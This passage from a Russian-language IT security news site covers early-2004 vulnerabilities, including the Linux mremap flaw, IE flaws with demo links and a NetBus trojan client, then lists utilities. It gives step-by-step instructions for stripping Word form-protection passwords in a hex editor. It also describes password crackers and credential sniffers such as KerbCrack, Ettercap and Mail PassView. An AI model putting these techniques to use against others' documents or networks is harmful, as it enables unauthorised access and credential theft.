ощущение, что об этом уже сообщалось ранее, но статья на APCmag появилась именно сегодня - 5 января).
Подробности - http://www.apcmag.com/apc/v3.nsf/0/06F992F180384F75CA256E12000087DD

5/01/2004 16:12 Локальная уязвимость в ядре Linux.
Paul Starzetz и Wojciech Purczynski из польской группы iSEC Security Research сообщают об обнаружении уязвимости в ядрах Linux тсабильных веток 2.2, 2.4, 2.6. Уязвимость обнаружена в алгоритме обработки границ в коде управления памятью при использовании системного вызова mremap(2). Этото вызов отвечает за изменение размеров (увеличение или уменьшение) адресного пространства процессов назначенных областей виртуальной памяти (VMA). Некорректная проверка границ обнаружена в коде ядра в реализации вызова do_mremap(), в результате чего может быть область виртуальной памяти нулевой длины. Создание подобных областей может привести к непредсказуемым последствиям в поведении системы и разрушению подсистемы управления памяти ядра. Авторы подчёркивают. что для выполнения подобных действий не требуется каких-либо специальных полномочий, то есть они могут быть выполнены обычным пользователем. Утверждается о создании кода эксплоита, при помощи которого был получен шелл с UID=0 (полномочия суперпользователя), что. по словам авторов не является довольно сложной задачей. В плане осуществления атаки на ядро 2.4 было обнаружено, как минимум, 2 вектора атаки. Как утверждается, выпущена соответствующая версия ядра 2.4.24-rc1, также существует патч от Марцелло Тосатти (координатора работ по ветке 2.4). Хотелось бы заметить, что предыдущая дыра в системном вызове do_brk() также была обнаружена в декабре прошлого года членами той же группы. Весело начинается 2004-й год, надо заметить...
Подробности - http://isec.pl/vulnerabilities/isec-0013-mremap.txt

5/01/2004 15:56 Выход Fluxbox 0.9.7.
На сайте разработчиков сообщается о доступности очередной версии Fluxbox, довольно популярного и, что самое главное, самого "лёгкого" оконного менджера для операционных систем с открытым исходным кодом. В новой версии добавлены некоторые новые возможности, а также исправлен ряд ошибок. Сам релиз является скорее девелоперским, однако (как показывает практика предыдущих выпусков) даже очень вполне работоспособным. Вполне возможно, что вскоре всё-таки появится стабильная версия программы 1.0.0. Недавно на сайте был опубликован пакет русской документации по Fluxbox.
Подробности - http://www.fluxbox.org/version-0.9.php

5/01/2004 15:41 Веб-серферы забросили браузеры.
Опубликованный во вторник отчет Nielsen//NetRatings утверждает, что 76% активных пользователей интернета обращаются к ресурсам Сети без использования браузеров. Популярностью пользуются различные проигрыватели файлов и программы обмена сообщениями. Аналитик Nielsen//NetRatings Абха Бхагат (Abha Bhagat) считает это признаком роста функциональных возможностей Сети. Граница между сетевым миром и рабочим столом размывается, интернет становится полноправной частью рабочего места. Самым популярным приложением прошлого месяца стал Windows Media Player. Его использовали 34% интернет-пользователей. За ним следуют AOL Instant Messenger (20.27%), плейеры RealNetworks (19.76 %), MSN Messenger (19.31%) и Yahoo! Messenger (12.26 %). Браузер Mosaic, отметивший недавно свое десятилетие, благодаря графическому интерфейсу сделал интернет доступным для нетехнических пользователей. Однако, по мнению аналитиков, распространение интернет-приложений постепенно приведет IT-промышленность к новым формам веб-жизни.
Источник - http://www.webplanet.ru

5/01/2004 14:30 Червивый подарок старого года.
Напоследок 2003 г. не преминул оставить пользователям заразный сюрприз, который вызвал переполох в Сети. Антивирусная компания Panda Software предупреждает серферов о новом черве Jitux.A, который распространяется через MSN Messenger. Новоявленная инфекция содержит ссылку на веб-страницу www.home.no, которая при активации автоматически загружает на ПК пользователя вирусный файл JITUXRAMON.EXE. Далее червь обосновывается в памяти компьютера и начинает рассылать зараженные сообщения-подарочки по всем адресам контакт-листа каждые пять минут. Пик эпидемии пришелся на 2 января. Более всего пострадали пользователи Испании, Мексики и Португалии. Как обычно, чтобы заранее обезопасить себя Panda Software советует всем веб-серферам как можно быстрее обновить антивирусные базы. Как сообщает Web-User.Co.Uk, пользователи могут бесплатно загрузить PandaActiveScan, который доступен на сайте компании.
Источник - http://www.runet.ru

4/01/2004 18:47 Война со спамом обращается против открытых прокси.
Сервис Spamhaus Exploits Block List позволит компаниям отбиться от атак через открытые прокси, которые используются в качестве ретрансляторов спама, а также через другие спамерские инструменты. Антиспамерский сайт Spamhaus открыл новую бесплатную службу, которая поможет ISP и компаниям отсекать гораздо больше спама на внешних рубежах своих серверов. Exploits Block List (XBL) представляет собой базу данных IP-адресов, по которым выявлены «нелегальные» эксплойты, такие как открытые прокси. Так называют серверы, позволяющие устанавливать соединения из любой точки с кем угодно через произвольные порты и по произвольным протоколам. Это означает, что спамеры могут использовать такой сервер для массовой рассылки, не опасаясь, что их выследят. За соединениями через открытые прокси часто бывает невозможно проследить, так как такие серверы не ведут журналов, а если и ведут, то они могут оказаться недоступными для того, кто занимается расследованием сетевых инцидентов. XBL поможет также блокировать червей или вирусы со встроенными механизмами рассылки спама и другие типы троянских коней, используемые спамерами, говорится в заявлении Spamhaus. XBL служит дополнением к сервису Spamhaus Block List (SBL), который блокирует спам из прямых источников. SBL интегрирован с XBL, так что системным администраторам достаточно настроить функцию антиспамерской защиты DNSBL своих почтовых серверов (иногда называемую «черным списком DNS-серверов» или «RBL-серверами») на запросы по адресу xbl.spamhaus.org. Сервис предоставляется бесплатно.
Подробности - http://news.zdnet.co.uk/internet/0,39020369,39118851,00.htm

4/01/2004 17:00 Безопасность беспроводных сетей.
Представители Net Security подготовили обзор развития систем безопасности в беспроводных сетях за 2003 год, cообщает mobile-review.com. На конференции RSA был анонсирован проект систем защиты для беспроводных сетей. В апреле, на NetWorld+Interop представители Wi-Fi Alliance представили стандарт защищенного доступа WPA (Wi-Fi Protected Access) «Защищенный стандарт 802.11i вряд ли выйдет до 2005 года, но многие решения, предназначенные для него, мы считаем подготовленными и продуманными. Соответственно, многие из них включены в Wi-Fi Protected Access», - заявил Давид Коэн (David Cohen), председатель комитета по системам безопасности Wi-Fi Alliance. Кирк Алкорн (Kirk Allchorne), сопредседатель комитета той же организации считает, что «компании уже готовы задуматься о проблемах безопасности в беспроводных сетях». В июне большой шаг был произведен компанией Intel: Анди Брайант (Andy Bryant), финансовый директор последней, представил систему под названием «контролируемая беспроводная сеть» ("controlled wireless network"), с системами управления специфическими механизмами доступа. Технический директор ICSA (часть корпорации TruSecure) Роберт Московит (Robert Moskowitz) и ноябрь принесли описание слабостей свежего стандарта (доклад "Weakness in Passphrase Choice in WPA Interface"). В частности автором указаны принципиальные недостатки, и даже пути проникновения в WPA сети. Этот доклад показал, насколько много недоработок остается в новейших стандартах. Есть надежда, что ошибки будут испралены.
Источник - http://www.net-security.org/

4/01/2004 16:48 Очередная уязвимость в IE-2.
В дополнение в к предыдущей уязвимости, известный исследователь "безопасности" Internet Explorer, скрывающийся под ником http-equiv опубликовал демку ещё одной уязвимости IE. Уязвимость скрывается в обработке ярлыков через код сценария. Удаленный пользователь может выполнить произвольный код на целевой системе. ActiveX объект 'Shell.Application' может использоваться для изменения известных ярлыков ('.lnk' файл) и затем выполнить измененные ярлыки. Ярлык может ссылаться на код, расположенный на удаленном сайте, который будет выполнен на целевой системе. Уязвимости по-прежнему подвержены версии 6.0 и ниже. Надо сказать, неплохой новогодний подарок в общую копилку "защищённости" "сами-знаете-кого". :) Технологию, применённую в приведённом ниже файле автор назвал "самовыполняющимся HTML-файлом" (Self-Executing HTML).
Демка - http://www.malware.com/exe-cute-html.zip

4/01/2004 15:28 Возможность обхода защиты в Microsoft Word.
Thorsten Delbrouck из Guardeonic Solutions AG (Мюнхен, Германия) сообщает об обнаружении им узявимости в механизме защиты документов, созданных при помощи популярного текстового процессора Microsoft Word. Word предоставляет пользователям защиту, которая известна, как защита "формы" при помощи пароля. Эта защита ограничивает возможности постороннего пользователя в манипулировании данными, содержащимися внутри Word-документа, за исключением специально назначенных "форм". Автор утверждает, что подобную защиту можно очень просто обойти, используя любой 16-ричный (HEX) редактор. Подобный механизм выбирается при помощи последовательности действий: "Tools" -> "Protection" -> "Forms" c заданием пароля в соотв. поле ("Сервис" -> "Установить защиту" -> далее запрет действий вне полей форм и ввод пароля в русской версии). При сохранении документа в HTML-формате пароль сохраняется внутри определённого тэга в виде контрольной суммы, вычисляемой по алгоритму, подобному CRC32. И, хотя точный алгоритм вычисления суммы не известен, однако автор заметил, что, если изменить это значение на число вида 0x00000000, пароль будет представлять собой пустую строку. Для снятия защиты автор предлагает найти 16-ричное число внутри тэгов <w:UnprotectPassword> </w:UnprotectPassword>. Затем запомнить число и записать его в обратном порядке (reverse order! - обратный порядок следования байт?). Затем открыть соотв. DOC-файл в 16-ричном редакторе - найти соотв. число и заменить все 4 двойных байта на 0x00 и сохранить. После этого: Открыть документ, "Tools / Unprotect Document" - пароль пустой. К сожалению, на настоящий момент сайт www.securityfocus.com не отзывается, поэтому внизу вынуждены привести просто ссылку на сам файл. Если кто захочет самостоятельно найти описание - искать в архиве Bugtraq по теме "Microsoft Word Protection Bypass".
Источник - http://www.securityfocus.com

4/01/2004 14:16 Очередная уязвимость в IE.
об очередной уязвимости в популярном Вэб-браузере Internet Explorer сообщает Arman Nayyeri. На этот раз опасность скрывается в файлах типа .CHM (HTML-help). Автор утверждает, что файл подобного типа может содержать обращенияк небезопасным элементам ActiveX, которые могут вызвать выполнение кода в контексте безопасности пользователя. Сам CHM-файл (и любые другие) могут быть загружены, например, с помощью Active Movie Control или путем загрузки CHM-Файла как HTML-приложение. Уязвимость обнаружена в версиях 5.х-6.0. Уязвимость связана с некорректной обработкой функции showHelp(). Работа проверялась на полнопатченных версиях IE 6.0 в ОС WinXP/2003. аввтором выложен рабочий демонстрационный пример.
Пример - http://www.freewebs.com/arman2/showamp.htm

4/01/2004 14:00 Linux XP Professional Edition.
Довольно любопытный проект российских разработчиков с "узнаваемым" ;) названием Linux XP Professional Edition разрабатывается компанией "Линукс-Онлайн". Linux XP Professional Edition - это универсальная и безопасная операционная система для русскоязычных домашних и бизнес-пользователей, основанная на открытых программных решениях мирового лидера в области Linux - корпорации RedHat, Inc. Впервые за 15 лет представляется настоящая альтернатива Windows-системам, способная удивить даже требовательных пользователей, которые получат полный набор удобных программ по разумной цене. В разработке взята за основу версия Linux от известного производителя RedHat, Inc. под названием Fedora Core, первая версия которой вышла в ноябре прошлого года (вторая намечена к выпуску 5 апреля сего года). Напомним, что компания RedHat объявил о том, что название RedHat отныне будет присваиваться только коммерческой версии продукта компании - RHEL - RedHat Enterprise Linux. Хотелось бы отметить, что хоть компанией и открыт сайт проекта, но кроме титульной страницы с громкими заявлениями больше ни одна из ссылок не работает. Будем надеяться, что в дальнейшем проект заработает. Если учитывать число, когда было сделано заявление о новом проекте - 30 января - надежда всё-таки остаётся.. ;)
Сайт проекта - http://www.linux-xp.ru/

3/01/2004 14:46 Клиент для NetBus.
Пан konewka из Польши представил широкой публике написанного им клиента для управления машиной, заражённой трояном NetBus. По словам автора, работа проверялась с NetBus версии 1.7. Напомним, что троян NetBus является довольно старым трояном, слушающим сокет на порту 12345, однако, возможно, кому-то может пригодиться эта программа. Исходник написан на Си для ОС Linux и должен собираться с загрузкой модулей библиотеки ncurses, что, надо понимать, предполагает графическую оболочку клиента.
Исходник - http://packetstorm.linuxsecurity.com/UNIX/misc/netbus-client.c

3/01/2004 14:33 Поставить точку в биографии BIOS.
В 2004 году Intel и Microsoft приступят к первой крупной перестройке самой глубинной части персонального компьютера —стыка между программным обеспечением и аппаратурой. Компании начнут продвигать технологическую спецификацию EFI (Extensible Firmware Interface) в качестве новой системы запуска аппаратуры ПК перед началом загрузки операционной системы — этот процесс происходит всякий раз при включении и перезагрузке компьютера. Intel и Microsoft создадут форум по продвижению новой спецификации в качестве стандарта. Если ПО на базе EFI получит широкое признание, это может привести к первой в истории индустрии ПК смене караула предзагрузочного ПО — хотя некоторые скептики утверждают, что такой переход может потребовать времени или вообще не состояться. Сейчас задачу подготовки аппаратуры ПК к загрузке операционной системы решает программа BIOS, или basic input/output system. Если когда-то конструкция BIOS была относительно прямолинейной, то с годами, изменяясь и подстраиваясь под новые технологии, она стала напоминать миску со спагетти. Сторонники EFI утверждают, что новая система облегчит компаниям введение усовершенствований и попутно ускорит процесс загрузки ПК. Первый EFI-компьютер — от Gateway — поступил в продажу в ноябре. Другие должны появиться в 2004 году, а в последующие годы их станет еще больше. Но на поезд EFI спешат не все. Традиционно производители ПК отказываются менять свои компьютеры, особенно корпоративные, часто предпочитая стабильность. Это стало причиной долголетия флоппи-диска, несмотря на многие попытки покончить с ним. Не торопится осваивать EFI и один из главных разработчиков BIOS Phoenix Technologies. Компания, чье ПО BIOS применяется большинством крупнейших мировых производителей ПК, не собирается переходить на EFI до тех пор, пока технология не станет стандартом. Phoenix разработала собственную альтернативу BIOS для ноутбуков — Core Management Environment и в 2004 году планирует добавить аналогичное ПО для серверов и настольных ПК. Более пподробно о технологии EFI можно прочитать в ссылке, приведённой ниже.
Подробности - http://www.zdnet.ru/?ID=311950

3/01/2004 13:25 Основная команда разработчиков XFree86 объявила о самороспуске.
Как сообщает bugtraq.ru, в конце ушедшего в историю 2003 года основная команда (core team) разработчиков самой известной (и самой удачной) open source-реализации XWindow объявила о своем самороспуске. В то же время, отмечается, что это не означает прекращения существования самой XFree86, и что активные участники старой команды будут продолжать работу над проектом. В общем, похоже, что это просто такой радикальный способ чистки рядов.
Подробности - http://www.mail-archive.com/xfree86@xfree86.org/msg11932.html

3/01/2004 12:21 "Отец Всемирной паутины" стал Рыцарем Британской империи.
Создатель Всемирной паутины (World Wide Web) Тим Бернес-Ли (Tim Berners-Lee) удостоен титула Рыцаря Британской империи, сообщает lenta.ru. Имя "отца WWW" внесено в список награжденных, который королева Великобритании Елизавета II традиционно подписывает в канун Нового года. В 1989 году сотрудник исследовательского центра Cern в Женеве Бернес-Ли разработал метод, который позволял пользователям компьютеров получать доступ к электронным документам при помощи системы, названной гипертекст. Два года спустя, Бернес-Ли создал первый интернет-браузер, для просмотра и редактуры электронных документов, отныне называемых веб-страницами, а также разработал первый веб-сервер. C 1994 года он возглавляет созданный им Международный Web-консорциум (The World Wide Web Consortium, W3C).
Подробности - http://news.bbc.co.uk/2/hi/technology/3357073.stm

3/01/2004 12:08 Обновление ProFTPD в Mandrake.
Итак, господа, с наступившим вас Новым Годом. Мы позволили себе 2 дня отдыха, после чего с настоящим пролетарским энтузиазмом приступили к работе. Итак, приступим, помолясь. Компания MandrakeSoft cообщает об обновлении входящего в состав дистрибутива Mandrake Linux FTP-сервера ProFTPD. Ещё в сентябре теперь уже прошедшего 2003 года компания ISS (Internet Security Systems, Inc.) обнаружила уязвимость в этом популярном FTP-сервере. Заключалась она в том, что в результате некорректной обработки ASCII-файла удалённый атакующий (сформировав специально оформленный файл), имеющий полномочия для "заливки" на удалённый FTP-сервер мог получить оболочку (шелл) с правами суперпользователя). Собственно, сама команда разработчиков ProFTPD, равно как и производители остальных дистрибутивов уже обновили свои продукты. Однако в дистрибутиве Mandrake была допущена досадная оплошность, которая присодила к тому, что при выдаче команды "NLST -alL" с длиной выходных данных более 1024 байта, сервер умирал в результате сигнала 11. В итоге перед самым НГ команда Mandrake решила обрадовать своих фанатов обновлением ProFTPD. Новая версия доступна на сайте в виде пакета
Подробности - http://www.mandrakesecure.net/en/advisories/

Программы дня за прошедшую неделю:

21/12/2004 ISIC
Набор утилит для тестирования стабильности протокола IP удаленных ОС. Отправляет псевдослучайные последовательности tcp, udp, icmp пакетов на тестируемую машину с заданным % каждого протокола. Может применятся для тестирования правил файрвола, поиска уязвимостей tcp/ip, зафлуживания сниферов и т.п.
ОС: Unix
Тип программы: Сетевые утилиты

16/12/2004 Traffic Calculators
Программа для расчетов нагрузки, количества каналов и процента потерь по формулам Эрланга. Русская и английская версия (15Kb).
ОС: All Win
Тип программы: Прочее

14/12/2004 TrueCrypt
Программа позволяет создавать виртуальные шифрованные диски в файлах, наподобие того, как это делает PGPDisk, а затем подключать их как логические диски Windows. Кроме этого, в качестве хранилища виртуального диска может быть использован один из разделов диска(partition), а также устройства типа USB-flash и дискеты.
В отличие от PGP-диска, имеющего в заголовке специфическую сигнатуру, TrueCrypt-диск не может быть идентифицирован (ни одна из частей виртуального диска не отличается от случайных данных).
Используемые алгоритмы: AES (256-bit key), Blowfish (448-bit key), CAST5 (128-bit key), Serpent (256-bit key), Triple DES, а также Twofish (256-bit key).
ОС: Win NT/2k/XP
Тип программы: Криптография

12/12/2004 Stream Explorer
Программа позволяет просматривать содержимое дополнительных информационных потоков файлов под MS Windows NT 4.0, 2000, XP, или 2003 платформой. При помощи этой программы возможно выяснить, какие данные теряются при копировании файлов.
ОС: Win NT/2k/XP
Тип программы: Дисковые утилиты

11/12/2004 40tude Dialog
Программа чтения новостных групп(Usenet) с поддержкой Unicode. Программа имеет очень удобный настраиваемый интерфейс, поддерживает одновременную работу с несколькими серверами, имеет встроенную систему фильтрации сообщений, умеет обрабатывать прикрепленные файлы разных типов, в том числе кодированные Mime (Base64), а также имеет встроенный просмоторщик видео-файлов, изображений и HTML документов. Из дополнительных функций можно выделить импорт/экспорт сообщений, поддержка закладок, адресную книгу и многое, многое другое.
ОС: All Win
Тип программы: Почта

10/12/2004 Angry IP Scanner
Небольшой сканер портов, обладающий большой скоростью сканирования. Из дополнительных возможностей сканера можно выделить следующие:
+ возможность задавать любые интервалы IP-адресов сканирования;
+ получение NetBIOS(имя компьютера, рабочая группа, имя текущего пользователя и MAC адрес) информации по IP-адресу;
+ сохранение результата сканирования в файле формата: CSV, TXT, HTML или XML;
+ возможность задания параметров сканирования из командной строки;
+ поддержка плагинов, увеличивающих функциональность сканера;
и многое другое.
ОС: All Win
Тип программы: Сканеры портов

9/12/2004 TCPView
Программа, позволяющая получать детализированный отчет об активных в данный момент TCP и UDP соединениях, а также создавших этих соединения приложениях.
ОС: Win 2k/XP
Тип программы: Мониторинг сети

8/12/2004 KerbCrack
Программа является сниффером Kerberos-сессий в локальной сети. Состоит из двух программ - kerbsniff и kerbcrack. Первая выполняет функции прослушивания сети и перехвата траффика. Вторая на основании принятых данных пытается расшифровать пароли, содержащиеся в них, применяя при этом или метод брутефорса (подбора), или подбор по словарю. Поддерживает работу из командной строки.
ОС: Win 2k/XP
Тип программы: Мониторинг сети

7/12/2004 Daemon Tools
Небольшая и удобная программа для работы с образами компакт-дисков в различных форматах, включая ISO, CCD (CloneCD), BWT (Blindwrite), NRG (Nero) и другие. При запуске игр с помощью образа их диска позволяет эмулировать условия для обхода многочисленных схем защиты от копирования. Кроме этого эта программа может быть успешно использована как виртуальный CD(DVD)-ROM.
ОС: All Win
Тип программы: Дисковые утилиты

6/12/2004 DeleGate
Многоплатформенный шлюз уровня приложений, или прокси-сервер, может выступать посредником при передаче данных по различным протоколам (HTTP, FTP, NNTP, POP, Telnet и др.), позволяет кэшировать и изменять проходящие через него данные, контролировать доступ от клиентов и маршрутизацию к серверам, преобразует протоколы, объединяет несколько серверов в один, доступный через псевдонимы или фильтрацию. Кроме всего этого, он может использоваться как простейший сервер для ряда протоколов (HTTP, FTP и NNTP).
ОС: Cross-platform
Тип программы: Сетевые утилиты

5/12/2004 Roadkil's Unstoppable Copier
Программа копирования файлов с поврежденных CD, дискет и жестких дисков. При копировании обычным способом программы обычно просто перестают копирование испорченных файлов, эта же программа производит побайтовое копирование, в случае если заданный байт файла не читабелен после нескольких попыток, программа заменяет байт пробелом и продолжает копирование дальше, затем пропущенные байты можно восстановить, используя информацию о восстанавливаемом файле. Программа поддерживает пофайловое копирование, копирование целых папок и копирование группы файлов с использованием шаблонов('*', '?').
ОС: All Win
Тип программы: Восстановление информации

4/12/2004 ArcConvert
Небольшая утилита, основной задачей которой является конвертация одного типа архива в другой. Программа поддерживает следующие виды конвертаций: (7-ZIP/ LZH/ CAB/ ZIP/ ARJ/ ACE/ RAR/ TAR/ TGZ/ GZ/ Z/ BZ2/ YZ1/ GCA/ BEL/ RPM/ DEB/ BH) в (ZIP/ 7-ZIP/ CAB/ LHA/ TAR/ TGZ/ BZ2/ YZ1/ BGA/ RAR/ ACE). Программа распространяется в двух видах: приложение с графическим пользовательским интерфейсом и консольное приложение.
ОС: All Win
Тип программы: Архиваторы

3/12/2004 Lepton's Crack
Программа для взлома паролей при помощи словаря или непосредственно перебором по символам. Умеет подбирать пароль, используя регулярные выражения, что облегчает подбор при известной хотя бы некоторой части пароля. Поддерживает следующие виды паролей: MD4 hash, MD5 hash, NT MD4/Unicode, Lotus Domino HTTP password (R4) и SHA-1. LM (LAN Manager).
ОС: Cross-platform
Тип программы: Взломщики паролей

30/11/2004 Tftpd32
Небольшая программа, которая включает в себя DHCP, TFTP, SNTP и Syslog сервера, а так же TFTP клиент c поддержкой стандарта TFTPv2, что обеспечивает максимум настроек для управления обменом данными по протоколу TFTP.
ОС: All Win
Тип программы: TFTP

29/11/2004 CmosPwd
Утилита для расшифровки пароля, установленного в BIOS. Программа поддерживает работу со следующими типами BIOS:
- ACER/IBM BIOS;
- AMI BIOS;
- AMI WinBIOS 2.5;
- Award 4.5x/4.6x/6.0;
- Compaq (1992);
- Compaq (New version);
- IBM (PS/2, Activa, Thinkpad);
- Packard Bell;
- Phoenix 1.00.09.AC0 (1994), a486 1.03, 1.04, 1.10 A03, 4.05 rev 1.02.943, 4.06 rev 1.13.1107;
- Phoenix 4 release 6 (User);
- Gateway Solo - Phoenix 4.0 release 6;
- Toshiba;
- Zenith AMI.
Поддерживаемые ОС: Dos-Win9x, Windows NT/W2K/XP/2003, Linux, FreeBSD and NetBSD.
ОС: Cross-platform
Тип программы: Взломщики паролей

28/11/2004 Ettercap
Многоцелевой консольный сниффер, предназначенный для работы в локальных сетях, которые основаны на switch'ах. Программа позволяет получать пароли большинства известных протоколов - TELNET, FTP, POP, RLOGIN, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, HALF LIFE, QUAKE 3, MSN, YMSG и др., в том числе защищенных протоколов, таких как SSH1, HTTPS.
ОС: Cross-platform
Тип программы: Мониторинг сети

27/11/2004 Mail PassView
Программа для просмотра сохраненных на вашем компьютере паролей аккаунтов электронной почты в различных почтовых клиентах. Программа поддерживает работу со следующими почтовыми клиентами:
+ Outlook Express;
+ Microsoft Outlook 2000 (только POP3 и SMTP аккаунты);
+ Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP и SMTP аккаунты);
+ IncrediMail;
+ Eudora;
+ Netscape 6.x/7.x;
+ Mozilla Thunderbird;
+ Group Mail Free;
+ Yahoo! Mail (если пароль был сохранен в Yahoo! Messenger);
+ Hotmail/MSN mail (если пароль был сохранен в MSN Messenger);
+ Gmail (если пароль был сохранен в Gmail Notifier).
Кроме паролей программа показывает: имя пользователя, название клиента, адрес электронной почты, адрес севрера, тип сервера(POP3/IMAP/SMTP), логин и пароль. Вся полученная информация может быть сохранена в HTML формате.
ОС: All Win
Тип программы: Взломщики паролей

26/11/2004 MyUninstaller
Утилита, являющиеся альтернативой стандартному апплету MS Windows "Установка и удаление программ". Программа отображает список установленных программ, который вы можете сохранить в виде текстового файла или HTML файла. О каждой установленной программе отображается и дополнительная информация, такая как компания производитель, версия, папка и многое др.
ОС: All Win
Тип программы: Системные утилиты

25/11/2004 BORGChat
Программа для организации чата в локальной сети, имеет очень постой интерфейс и большое количество различных функций, такие как:
+ организация приват чатов, защищенных паролем;
+ организация общих конференций;
+ пересылка файлов с возможностью изменения скорости передачи;
+ просмотр расшаренных ресурсов на компьютерах локальной сети;
+ более 80 анимированных смайликов;
+ поддержка HTML форматирования текста(Bold,Italic,Underline,Insert: IMG,QUOTE,URL,HR);
+ установка различных режимов активности;
+ создание фильтров сообщений;
+ информация о пользователях содержит(размер памяти компьютера, ОС, процессор, IP, MAC, NetBIOS имя компьютера);
+ ведение логов сообщений;
+ мультиязыковая поддержка интерфейса(в том числе Русский);
и многое другое.
ОС: All Win
Тип программы: Чат

24/11/2004 MiTeC Registry File Viewer
Программа для просмотра файлов реестра(таких как NTUSER.DAT, SYSTEM.DAT, SYSTEM.1ST, SAM и др., кроме файлов REG) MS Windows систем, содержимое открытого файла отображается в виде стандартного оформления программы RegEdit. В программе встроена возможность поиска, дампинга и экспорта в формат REGEDIT4.
ОС: All Win
Тип программы: Системные утилиты

23/11/2004 NetSetMan
Утилита, позволяющая быстро изменять сетевые настройки ОС. Данная программа будет очень полезна обладателям переносных компьютеров, которым приходится неоднократно изменять сетевые параметры. Программа имеет возможность переключаться между 5 профилями с различными сетевыми конфигурациями. Конфигурации содержат основные сетевые настройки, такие как: IP-адрес, маска подсети, адрес шлюза и DNS сервера. Интерфейс программы очень прост, переключение между различными профилями осуществляется переходами между вкладками с соответствующими настройками.
ОС: Win 2k/XP
Тип программы: Сетевые утилиты

17/11/2004 MAX`s HTML Beauty++ 2004
Профессиональный HTML редактор для MS Windows систем, позволяет создавать как отдельные HTML-файлы, так и проекты, содержащие большое количество HTML и графических файлов. Основные особенности:
+ более подробная подсветка синтаксиса;
+ большое количество различных функций редактирования текста;
+ проверка грамматики и орфографии;
+ библиотека кодов;
+ встроенный предпросмотр;
+ встроенный просмоторщик графических файлов;
+ встроенный конвертор изображений в формат WBMP;
+ большой набор различных скриптов;
+ встроена поддержка HTML TIDY;
и многое другое.
ОС: All Win
Тип программы: HTML

16/11/2004 VideoLAN
Видео плеер, который позволяет производить потоковую видео трансляцию в IPv4 или IPv6 сетях, поддерживаются следующие форматы файлов: MPEG-1, MPEG-2, MPEG-4 и DivX, DVDs, а также спутниковые и телевизионные каналы.
ОС: Cross-platform
Тип программы: Сетевые утилиты

15/11/2004 Partition Image
Утилита для создания образов любых разделов жесткого диска следующих файловых систем: ReiserFS, ext2fs/ext3fs, FAT16/32, NTFS, JFS, XFS, HPFS, HFS, UFS. Файл образа может быть сжат при помощи gzip или bzip2, возможно также разбить полученный файл образа на несколько частей, например под размер дискеты. Программа может быть записана как boot/root диск, что позволит запустить ее без установленной Linux системы на жестком диске.
ОС: Unix
Тип программы: Дисковые утилиты

14/11/2004 LANScope
LanScope предназначен для сканирования разделяемых (NetBios) ресурсов и FTP ресурсов в вашей локальной сети, вы можете искать все ресурсы, а также ресурсы удовлетворяющие условиям поиска (Install, Pic, Video, Music и т.п.). В отличие от подобного рода программ, LanScope может получать папки с FTP серверов и определять наличие установленного сервиса http на удалённом хосте.
ОС: Win 2k/XP
Тип программы: Сетевые сканеры

13/11/2004 Vilma Registry Explorer
Утилита для редактирования реестра ОС, которая обладает приятным интерфейсом и богатыми функциональными возможностями, такими как поиск заданного фрагмента или значения ключа, создание закладок для быстрого перехода по веткам реестра, возможность экспорта/импорта отдельных областей реестра, кроме этого программа сохраняет данные, перед их изменением, что позволяет при необходимости восстановить предыдущие значение.
ОС: All Win
Тип программы: Системные утилиты

12/11/2004 CRC Faker
Программа позволяющая создать файл с необходимым размером CRC32 контрольной суммой. Благодаря специальному алгоритму перебора данная программа может создать файл с заданной CRC32 контрольной суммой за 5-10 минут на процессоре 1.2 GHz и выше.
ОС: Cross-platform
Тип программы: Файловые утилиты

11/11/2004 AVIPreview
Программа в процессе скачивания видео-файла позволяет просмотреть его содержимое, не прерывая саму загрузку, что позволяет узнать реальное качество видео файла и убедится в том, что скачиваемый вами видео файл действительно тот, что вам нужен. Программа поддерживает следующие форматы: AVI, divX, MPG, MPEG и VideoCD.
ОС: All Win
Тип программы: Прочее

10/11/2004 HideOE
Небольшая утилита, которая позволяет поместить Outlook Express в трей, возле часов, благодяря этому вы сможете сэкономить место на панели задач, и производить проверку/отправку сообщений, новостных групп не открывая сам Outlook Express.
ОС: Win 9x/Me/2k/XP
Тип программы: Почта

9/11/2004 LPT 3D Hard Analyzer
Программа для снятия цифровых сигналов и протоколов работающих устройств, использующих или подключенных к параллельному (LPT 1-3) порту компьютера.
Программа содержит настраиваемый графический анализатор-осциллограф со следующими возможностями:
+ построение графиков в двухмерном и трехмерном виде;
+ две независимые диаграммы: 17 канальный (бит на канал) осциллограф и график регистров порта (входных, выходных, контрольных) с возможностью регулировки скорости анализа;
+ переключения для каждого бита в отдельности, с помощью которого отключаются не нужные для конкретных измерений графики;
+ оптимизация вывода графиков для относительно высокоскоростных протоколов устройств на маломощных компьютерах;
+ различные функции просмотра графиков;
+ сохранение полученных графиков в форматах BMP и WMF, возможно постраничное сохранение графика, т.е. каждая страница в новом файле;
+ возможно снятие информации с регистров LPT порта, с последующей фиксацией в логе (формат: hex, bite, состоянии бит).
Кроме анализа сигналов с порта, программа позволяет производить:
+ запись данных в порт в форматах Hex и Byte;
+ управление логическим состоянием бит (Pin) LPT порта с помощью Pin клавиатуры;
+ производить проверку на двунаправленность (если включен в Bios), работа в режиме EPP ( переключение вход / выход, мониторинг).
На сайте автора вы сможете более подробно узнать о сфере применения данной программы и ознакомиться с примерами создания программ для управления внешними устройствами посредством LPT порта на основе данной программы.
ОС: All Win
Тип программы: Железо

8/11/2004 Com Port Visual Control
Программа предназначена для визуального контроля, документирования и исследования процессов, происходящих в приёмопередатчике UART во время работы приложений использующих СОМ порт персонального компьютера. Программа имеет следующие возможности:
+ Постоянный мониторинг всех восьми регистров микросхемы UART : базового, разрешения прерываний, запроса прерываний, формата данных, управления модемом, состояния приёмопередатчика, состояния модема, сверхоперативной памяти. Контроллер имеет формат 8 x 8 - восемь регистров по восемь бит, при этом независимо для каждого регистра отображается: состояние значений в байт (0-255) и HEX ($00-$FF) одновременно, и логическое состояние (1/0) бит 0-7 (1-2-4-8-16-32-64-128).
+ Запись в регистры значений в форматах HEX и байт, управление логическим (1/0) состоянием бит, соответственно.
+ Отслеживание изменений в регистрах и ведение LOGa согласно командам приёмопередатчика UART.
+ Ведение LOGa принятых и переданных данных на уровне машинных кодов
(HEX, байт, состояние бит).
+ Просмотр и сохранение LOG файлов, поиск.
+ Имеется встроенный приёмопередатчик для стандартной настройки режимов порта: биты данных, стоповые биты, скорость, чётность, контроль ошибок, возможность приёма и передачи текстовых данных и команд модема.
+ Индикатор контроля активного состояния команд UART (17 основных команд).
